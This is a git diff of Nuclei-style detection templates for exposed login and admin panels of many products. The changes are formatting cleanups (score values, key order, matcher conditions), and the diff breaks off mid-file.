a/http/exposed-panels/telerik-server-login.yaml +++ b/http/exposed-panels/telerik-server-login.yaml @@ -7,11 +7,11 @@ info: description: Telerik Report Server login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Telerik Report Server" tags: telerik,panel @@ -22,9 +22,9 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - - type: word words: - "Telerik Report Server" diff --git a/http/exposed-panels/telesquare/tlr-2005ksh-login.yaml b/http/exposed-panels/telesquare/tlr-2005ksh-login.yaml index 9e855d6843..37fcbedbbb 100644 --- a/http/exposed-panels/telesquare/tlr-2005ksh-login.yaml +++ b/http/exposed-panels/telesquare/tlr-2005ksh-login.yaml @@ -7,11 +7,11 @@ info: description: Telesquare TLR-2005KSH login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"TLR-2005KSH" tags: panel,router,telesquare diff --git a/http/exposed-panels/teltonika-login.yaml b/http/exposed-panels/teltonika-login.yaml index 02d91817f6..3cd6439c03 100644 --- a/http/exposed-panels/teltonika-login.yaml +++ b/http/exposed-panels/teltonika-login.yaml @@ -10,7 +10,7 @@ info: - https://teltonika-iot-group.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/tembosocial-panel.yaml b/http/exposed-panels/tembosocial-panel.yaml index d171930ddf..5fe1699297 100644 --- a/http/exposed-panels/tembosocial-panel.yaml +++ b/http/exposed-panels/tembosocial-panel.yaml @@ -7,11 +7,11 @@ info: description: TemboSocial Admin panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"TemboSocial Administration" tags: panel,tembosocial @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/temenos-t24-login.yaml b/http/exposed-panels/temenos-t24-login.yaml index 2c587936d0..215dd8a578 100644 --- a/http/exposed-panels/temenos-t24-login.yaml +++ b/http/exposed-panels/temenos-t24-login.yaml @@ -9,11 +9,11 @@ info: - https://www.temenos.com/products/transact/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"t24 sign in" tags: panel,exposure,temenos diff --git a/http/exposed-panels/tenda-11n-wireless-router-login.yaml b/http/exposed-panels/tenda-11n-wireless-router-login.yaml index 5f4087a566..f97df7632a 100644 --- a/http/exposed-panels/tenda-11n-wireless-router-login.yaml +++ b/http/exposed-panels/tenda-11n-wireless-router-login.yaml @@ -8,14 +8,14 @@ info: The administrative panel for a Tenda Technology 11n Wireless Router was found. reference: - https://www.tendacn.com/products/11n-routers.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-668 metadata: max-request: 1 shodan-query: http.title:"Tenda 11N Wireless Router Login Screen" google-query: intitle:"Tenda 11N Wireless Router Login Screen" - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-668 tags: panel,tenda http: diff --git a/http/exposed-panels/tenda-web-master.yaml b/http/exposed-panels/tenda-web-master.yaml index e62e3eb919..d5609eefc7 100644 --- a/http/exposed-panels/tenda-web-master.yaml +++ b/http/exposed-panels/tenda-web-master.yaml @@ -7,11 +7,11 @@ info: description: Tenda Web Master login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Tenda Web Master" tags: panel,tenda,router diff --git a/http/exposed-panels/teradek-panel.yaml b/http/exposed-panels/teradek-panel.yaml index 7b6e7fa76b..47dce43973 100644 --- a/http/exposed-panels/teradek-panel.yaml +++ b/http/exposed-panels/teradek-panel.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.facebook.com/photo/?fbid=612496907587499&set=a.467014098802448 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Teradek Cube Administrative Console" tags: panel,login,teradek @@ -28,4 +28,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposed-panels/teradici-pcoip-panel.yaml b/http/exposed-panels/teradici-pcoip-panel.yaml index 73f037ceac..e2bc553164 100644 --- a/http/exposed-panels/teradici-pcoip-panel.yaml +++ b/http/exposed-panels/teradici-pcoip-panel.yaml @@ -7,11 +7,11 @@ info: description: Teradici PCoIP Zero Client login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,teradici,pcoip metadata: max-request: 1 + tags: panel,teradici,pcoip http: - method: GET diff --git a/http/exposed-panels/terraform-enterprise-panel.yaml b/http/exposed-panels/terraform-enterprise-panel.yaml index 9b25ed82ae..3d436c59d1 100644 --- a/http/exposed-panels/terraform-enterprise-panel.yaml +++ b/http/exposed-panels/terraform-enterprise-panel.yaml @@ -9,7 +9,7 @@ info: - https://www.terraform.io/enterprise/releases classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/terramaster-login.yaml b/http/exposed-panels/terramaster-login.yaml index eadd8309c3..606af0b58d 100644 --- a/http/exposed-panels/terramaster-login.yaml +++ b/http/exposed-panels/terramaster-login.yaml @@ -7,11 +7,11 @@ info: description: Terramaster login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,terramaster,login metadata: max-request: 1 + tags: panel,terramaster,login http: - method: GET diff --git a/http/exposed-panels/thinfinity-virtualui-panel.yaml b/http/exposed-panels/thinfinity-virtualui-panel.yaml index cbb21fa2de..6fda7cdfb9 100644 --- a/http/exposed-panels/thinfinity-virtualui-panel.yaml +++ b/http/exposed-panels/thinfinity-virtualui-panel.yaml @@ -7,7 +7,7 @@ info: description: Thinfinity VirtualUI panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/threatq-login.yaml b/http/exposed-panels/threatq-login.yaml index 9496bd71ad..d644d8d751 100644 --- a/http/exposed-panels/threatq-login.yaml +++ b/http/exposed-panels/threatq-login.yaml @@ -9,11 +9,11 @@ info: - https://www.threatq.com/threat-intelligence-platform/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,threatq metadata: max-request: 1 + tags: panel,threatq http: - method: GET diff --git a/http/exposed-panels/thruk-login.yaml b/http/exposed-panels/thruk-login.yaml index 20dd0d21e2..76a9bc149b 100644 --- a/http/exposed-panels/thruk-login.yaml +++ b/http/exposed-panels/thruk-login.yaml @@ -7,7 +7,7 @@ info: description: Thruk Monitoring panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/tigase-xmpp-server.yaml b/http/exposed-panels/tigase-xmpp-server.yaml index c797d79616..0bcbb26f2e 100644 --- a/http/exposed-panels/tigase-xmpp-server.yaml +++ b/http/exposed-panels/tigase-xmpp-server.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.facebook.com/photo/?fbid=617926933711163&set=a.467014098802448 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Tigase XMPP Server" tags: tigase,xmpp,server,panel,exposure @@ -26,4 +26,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposed-panels/tikiwiki-cms.yaml b/http/exposed-panels/tikiwiki-cms.yaml index abcaf21473..f9a0a4c74c 100644 --- a/http/exposed-panels/tikiwiki-cms.yaml +++ b/http/exposed-panels/tikiwiki-cms.yaml @@ -7,11 +7,11 @@ info: description: Tiki Wiki CMS Groupware login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,tikiwiki metadata: max-request: 2 + tags: panel,tikiwiki http: - method: GET @@ -24,6 +24,7 @@ http: - type: status status: - 200 + - type: word words: - "Tiki Wiki CMS Groupware" diff --git a/http/exposed-panels/tiny-file-manager.yaml b/http/exposed-panels/tiny-file-manager.yaml index 0176ce30c1..614e4a8c24 100644 --- a/http/exposed-panels/tiny-file-manager.yaml +++ b/http/exposed-panels/tiny-file-manager.yaml @@ -7,11 +7,11 @@ info: description: Tiny File Manager panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Tiny File Manager" tags: panel,filemanager @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/tooljet-panel.yaml b/http/exposed-panels/tooljet-panel.yaml index 6a27f953ec..dcd6ca9b8e 100644 --- a/http/exposed-panels/tooljet-panel.yaml +++ b/http/exposed-panels/tooljet-panel.yaml @@ -7,11 +7,11 @@ info: description: ToolJet login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"ToolJet - Dashboard" tags: panel,tooljet @@ -24,6 +24,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/total-web-solutions-panel.yaml b/http/exposed-panels/total-web-solutions-panel.yaml index a0f1cecc02..5c95ce744d 100644 --- a/http/exposed-panels/total-web-solutions-panel.yaml +++ b/http/exposed-panels/total-web-solutions-panel.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6811 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 google-query: intitle:"Total Web Solutions" + "Meter Name" tags: panel,edb diff --git a/http/exposed-panels/totemomail-panel.yaml b/http/exposed-panels/totemomail-panel.yaml index 038dcac262..c958d1eef3 100644 --- a/http/exposed-panels/totemomail-panel.yaml +++ b/http/exposed-panels/totemomail-panel.yaml @@ -9,11 +9,11 @@ info: - https://www.totemo.com/en/products/email-encryption classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 google-query: intext:"totemomail" inurl:responsiveUI tags: totemomail,panel @@ -24,6 +24,7 @@ http: - "{{BaseURL}}/responsiveUI/webmail/folder.xhtml" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/tracer-sc-login.yaml b/http/exposed-panels/tracer-sc-login.yaml index 9d15c1441d..4d24085636 100644 --- a/http/exposed-panels/tracer-sc-login.yaml +++ b/http/exposed-panels/tracer-sc-login.yaml @@ -9,11 +9,11 @@ info: - https://www.trane.com/commercial/north-america/us/en/products-systems/building-management---automation/building-automation-systems/tracer-sc-plus.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: tracer,trane,iot,panel,login metadata: max-request: 1 + tags: tracer,trane,iot,panel,login http: - method: GET diff --git a/http/exposed-panels/traefik-dashboard.yaml b/http/exposed-panels/traefik-dashboard.yaml index 591227d8b0..723b1524a1 100644 --- a/http/exposed-panels/traefik-dashboard.yaml +++ b/http/exposed-panels/traefik-dashboard.yaml @@ -5,20 +5,21 @@ info: author: schniggie,StreetOfHackerR007 severity: info description: Traefik Dashboard panel was detected. - metadata: - max-request: 1 - verified: true - shodan-query: http.title:"traefik" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"traefik" tags: panel,traefik http: - method: GET path: - "{{BaseURL}}/dashboard/" + matchers: - type: word words: diff --git a/http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml b/http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml index 7a73d93576..1e8001eaf2 100644 --- a/http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml +++ b/http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml @@ -7,7 +7,7 @@ info: description: TRENDnet TEW-827DRU login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/tufin-securetrack-login.yaml b/http/exposed-panels/tufin-securetrack-login.yaml index ecbcb1a8b5..fd085dd334 100644 --- a/http/exposed-panels/tufin-securetrack-login.yaml +++ b/http/exposed-panels/tufin-securetrack-login.yaml @@ -9,7 +9,7 @@ info: - https://www.tufin.com/tufin-orchestration-suite/securetrack classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -21,6 +21,7 @@ http: - method: GET path: - "{{BaseURL}}" + host-redirects: true max-redirects: 2 diff --git a/http/exposed-panels/tup-openframe.yaml b/http/exposed-panels/tup-openframe.yaml index fa6bd377d2..93da7a4fb0 100644 --- a/http/exposed-panels/tup-openframe.yaml +++ b/http/exposed-panels/tup-openframe.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.facebook.com/photo/?fbid=642772827893240&set=a.467014098802448 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:824580113 tags: exposure,login,tup,openframe,panel @@ -31,4 +31,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposed-panels/turnkey-openvpn.yaml b/http/exposed-panels/turnkey-openvpn.yaml index 471d5028b4..52a834bda1 100644 --- a/http/exposed-panels/turnkey-openvpn.yaml +++ b/http/exposed-panels/turnkey-openvpn.yaml @@ -7,11 +7,11 @@ info: description: TurnKey OpenVPN panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"TurnKey OpenVPN" tags: panel,openvpn,turnkey,webshell,vpn diff --git a/http/exposed-panels/tuxedo-connected-controller.yaml b/http/exposed-panels/tuxedo-connected-controller.yaml index 713275eaa1..aa69f00795 100644 --- a/http/exposed-panels/tuxedo-connected-controller.yaml +++ b/http/exposed-panels/tuxedo-connected-controller.yaml @@ -9,22 +9,24 @@ info: - https://www.exploit-db.com/ghdb/6486 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,tuxedo,edb metadata: max-request: 1 + tags: panel,tuxedo,edb http: - method: GET path: - "{{BaseURL}}/login.html" + matchers-condition: and matchers: - type: word words: - 'Tuxedo Connected Controller' part: body + - type: status status: - 200 diff --git a/http/exposed-panels/typo3-login.yaml b/http/exposed-panels/typo3-login.yaml index 6b02868e2c..39b3a4f3b8 100644 --- a/http/exposed-panels/typo3-login.yaml +++ b/http/exposed-panels/typo3-login.yaml @@ -7,11 +7,11 @@ info: description: TYPO3 login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,typo3 metadata: max-request: 1 + tags: panel,typo3 http: - method: GET diff --git a/http/exposed-panels/umbraco-login.yaml b/http/exposed-panels/umbraco-login.yaml index 75d6ea4cb2..9c718ea36b 100644 --- a/http/exposed-panels/umbraco-login.yaml +++ b/http/exposed-panels/umbraco-login.yaml @@ -9,11 +9,11 @@ info: - https://our.umbraco.com/documentation/Fundamentals/Backoffice/Login/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Umbraco" tags: panel,umbraco,detect @@ -25,6 +25,7 @@ http: cookie-reuse: true host-redirects: true max-redirects: 3 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/unauth-xproxy-dashboard.yaml b/http/exposed-panels/unauth-xproxy-dashboard.yaml index 5753b56b14..6dca0031a7 100644 --- a/http/exposed-panels/unauth-xproxy-dashboard.yaml +++ b/http/exposed-panels/unauth-xproxy-dashboard.yaml @@ -7,7 +7,7 @@ info: description: X-Proxy Dashboard panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/unauthenticated-frp.yaml b/http/exposed-panels/unauthenticated-frp.yaml index 7d2eb3907b..0ce552b119 100644 --- a/http/exposed-panels/unauthenticated-frp.yaml +++ b/http/exposed-panels/unauthenticated-frp.yaml @@ -9,11 +9,11 @@ info: - https://github.com/fatedier/frp/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: frp,unauth,panel metadata: max-request: 1 + tags: frp,unauth,panel http: - method: GET @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word words: - "frps dashboard" diff --git a/http/exposed-panels/unifi-panel.yaml b/http/exposed-panels/unifi-panel.yaml index 98e551323b..59fbf7581b 100644 --- a/http/exposed-panels/unifi-panel.yaml +++ b/http/exposed-panels/unifi-panel.yaml @@ -7,7 +7,7 @@ info: description: UniFi Network login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/untangle-admin-login.yaml b/http/exposed-panels/untangle-admin-login.yaml index 3fa8b3e3ad..a89cc61bff 100644 --- a/http/exposed-panels/untangle-admin-login.yaml +++ b/http/exposed-panels/untangle-admin-login.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: title:"Untangle Administrator Login" - verified: true tags: panel,untangle,admin,login http: @@ -26,6 +26,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/uptime-kuma-panel.yaml b/http/exposed-panels/uptime-kuma-panel.yaml index b026a08331..c3ed3691f6 100644 --- a/http/exposed-panels/uptime-kuma-panel.yaml +++ b/http/exposed-panels/uptime-kuma-panel.yaml @@ -10,8 +10,8 @@ info: - https://github.com/louislam/uptime-kuma - https://uptime.kuma.pet/docs/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Uptime Kuma" tags: uptime,kuma,panel,login diff --git a/http/exposed-panels/user-control-panel.yaml b/http/exposed-panels/user-control-panel.yaml index 82cc978979..7edf28746e 100644 --- a/http/exposed-panels/user-control-panel.yaml +++ b/http/exposed-panels/user-control-panel.yaml @@ -7,7 +7,7 @@ info: description: User Control Panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/v2924-admin-panel.yaml b/http/exposed-panels/v2924-admin-panel.yaml index e0bbbee512..a2b487ac40 100644 --- a/http/exposed-panels/v2924-admin-panel.yaml +++ b/http/exposed-panels/v2924-admin-panel.yaml @@ -9,11 +9,11 @@ info: - https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5538760399521122 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"V2924" tags: panel,v2924 diff --git a/http/exposed-panels/vault-panel.yaml b/http/exposed-panels/vault-panel.yaml index 3aca3c0ad3..f0f488918a 100644 --- a/http/exposed-panels/vault-panel.yaml +++ b/http/exposed-panels/vault-panel.yaml @@ -7,11 +7,11 @@ info: description: Vault login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-919788577 tags: panel,vault @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word words: - "Vault" diff --git a/http/exposed-panels/veeam-backup-azure-panel.yaml b/http/exposed-panels/veeam-backup-azure-panel.yaml index 1e3af0c089..50dc389460 100644 --- a/http/exposed-panels/veeam-backup-azure-panel.yaml +++ b/http/exposed-panels/veeam-backup-azure-panel.yaml @@ -7,7 +7,7 @@ info: description: Veeam Backup for Microsoft Azure panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/veeam-backup-gcp.yaml b/http/exposed-panels/veeam-backup-gcp.yaml index ecf8c7b68e..a8a9243f49 100644 --- a/http/exposed-panels/veeam-backup-gcp.yaml +++ b/http/exposed-panels/veeam-backup-gcp.yaml @@ -7,11 +7,11 @@ info: description: Veeam Backup for Google Cloud Platform panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Veeam Backup for GCP" tags: panel,google,cloud diff --git a/http/exposed-panels/veeam-panel.yaml b/http/exposed-panels/veeam-panel.yaml index 2cc589eeb6..5601323979 100644 --- a/http/exposed-panels/veeam-panel.yaml +++ b/http/exposed-panels/veeam-panel.yaml @@ -7,11 +7,11 @@ info: description: Veeam login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-633512412 tags: panel,veeam diff --git a/http/exposed-panels/veriz0wn-osint.yaml b/http/exposed-panels/veriz0wn-osint.yaml index 8f2be49593..e96a2afdca 100644 --- a/http/exposed-panels/veriz0wn-osint.yaml +++ b/http/exposed-panels/veriz0wn-osint.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Veriz0wn" tags: veriz0wn,panel diff --git a/http/exposed-panels/verizon-router-panel.yaml b/http/exposed-panels/verizon-router-panel.yaml index bbf7c76805..d01e6094a4 100644 --- a/http/exposed-panels/verizon-router-panel.yaml +++ b/http/exposed-panels/verizon-router-panel.yaml @@ -7,11 +7,11 @@ info: description: Verizon router panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Verizon Router" tags: panel,verizon,router diff --git a/http/exposed-panels/versa/versa-director-login.yaml b/http/exposed-panels/versa/versa-director-login.yaml index ac4e014cd5..4d3a860a36 100644 --- a/http/exposed-panels/versa/versa-director-login.yaml +++ b/http/exposed-panels/versa/versa-director-login.yaml @@ -9,11 +9,11 @@ info: - https://versa-networks.com/products/components/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"VERSA DIRECTOR Login" tags: panel,versa,director diff --git a/http/exposed-panels/versa/versa-flexvnf-panel.yaml b/http/exposed-panels/versa/versa-flexvnf-panel.yaml index ab7cacdec8..bc37b76312 100644 --- a/http/exposed-panels/versa/versa-flexvnf-panel.yaml +++ b/http/exposed-panels/versa/versa-flexvnf-panel.yaml @@ -9,11 +9,11 @@ info: - https://versa-networks.com/products/components/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Flex VNF Web-UI" tags: panel,versa,flexvnf diff --git a/http/exposed-panels/versa/versa-sdwan.yaml b/http/exposed-panels/versa/versa-sdwan.yaml index 3c8b28a00b..9ba91a746e 100644 --- a/http/exposed-panels/versa/versa-sdwan.yaml +++ b/http/exposed-panels/versa/versa-sdwan.yaml @@ -7,11 +7,11 @@ info: description: Versa SD-WAN login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,versa,sdwan metadata: max-request: 1 + tags: panel,versa,sdwan http: - method: GET diff --git a/http/exposed-panels/vertex-tax-panel.yaml b/http/exposed-panels/vertex-tax-panel.yaml index 71e465973e..90660a0575 100644 --- a/http/exposed-panels/vertex-tax-panel.yaml +++ b/http/exposed-panels/vertex-tax-panel.yaml @@ -7,11 +7,11 @@ info: description: Vertex Tax Installer panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Vertex Tax Installer" tags: panel,vertex diff --git a/http/exposed-panels/vidyo-login.yaml b/http/exposed-panels/vidyo-login.yaml index 4dc2feaf47..82c9d4bd25 100644 --- a/http/exposed-panels/vidyo-login.yaml +++ b/http/exposed-panels/vidyo-login.yaml @@ -7,7 +7,7 @@ info: description: Vidyo admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 diff --git a/http/exposed-panels/vigor-login.yaml b/http/exposed-panels/vigor-login.yaml index 2e78af6b92..e4c035159b 100644 --- a/http/exposed-panels/vigor-login.yaml +++ b/http/exposed-panels/vigor-login.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6610 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,login,edb metadata: max-request: 1 + tags: panel,login,edb http: - method: GET @@ -25,6 +25,7 @@ http: - type: word words: - 'Vigor Login Page' + - type: status status: - 200 diff --git a/http/exposed-panels/virtua-software-panel.yaml b/http/exposed-panels/virtua-software-panel.yaml index c65b1b5ebf..2b1681243d 100644 --- a/http/exposed-panels/virtua-software-panel.yaml +++ b/http/exposed-panels/virtua-software-panel.yaml @@ -7,11 +7,11 @@ info: description: Virtua Software panel was detected. classification: cvss-metrics: 